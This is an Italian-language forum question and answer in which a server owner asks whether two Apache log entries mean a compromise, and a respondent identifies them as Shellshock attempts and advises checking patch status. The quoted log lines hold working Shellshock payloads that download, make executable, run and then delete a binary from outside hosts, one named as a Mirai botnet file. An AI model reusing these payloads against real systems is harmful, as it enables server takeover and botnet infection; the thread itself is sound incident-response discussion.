I registri di Apache mostrano l'esecuzione dei comandi

Naviga le tue risposte
1

Mi chiedo se il mio server è compromesso o meno. Ho appena guardato il mio log e ho visto la seguente riga: 

IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bin/wget http://162.243.117.130/zmuie -O /tmp/zmuie;wget http://162.243.117.130/zmuie -O /dev/shm/zmuie;chmod +x /dev/shm/zmuie /tmp/zmuie;/dev/shm/zmuie;/tmp/zmuie;rm -rf /dev/shm/zmuie /tmp/zmuie*"
IP: 183.90.60.51, Date: 28-12-17, Time:06:13:07, Browser: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'

Non sono sicuro se fossero in grado di eseguire quel comando con successo o meno. Ho spento il mio server.

    
posta Bruteforce 28.12.2017 - 20:24
fonte

1 risposta

3

Mentre si può vedere dal log del server che è stato tentato un exploit usando la vulnerabilità Shellshock è impossibile dire basandosi solo su questo log se l'exploit ha avuto successo.

Il tuo primo controllo dovrebbe probabilmente essere scopri se il tuo sistema è vulnerabile contro questo tipo di exploit. Questo non dovrebbe essere il caso se il tuo sistema ha aggiornamenti correnti. Se il tuo sistema è vulnerabile, dovresti trattarlo come compromesso, non importa se dai recenti tentativi di exploit o da vecchi tentativi poiché il bug è conosciuto e sfruttato per un lungo periodo.

    
risposta data 28.12.2017 - 20:31
fonte

Leggi altre domande sui tag

Verifica delle vulnerabilità hardware (come Intel Management Engine) semiautomatizzata? È possibile che un utente malintenzionato registri le mie sequenze di tasti su un server Linux che non ha un sistema X window?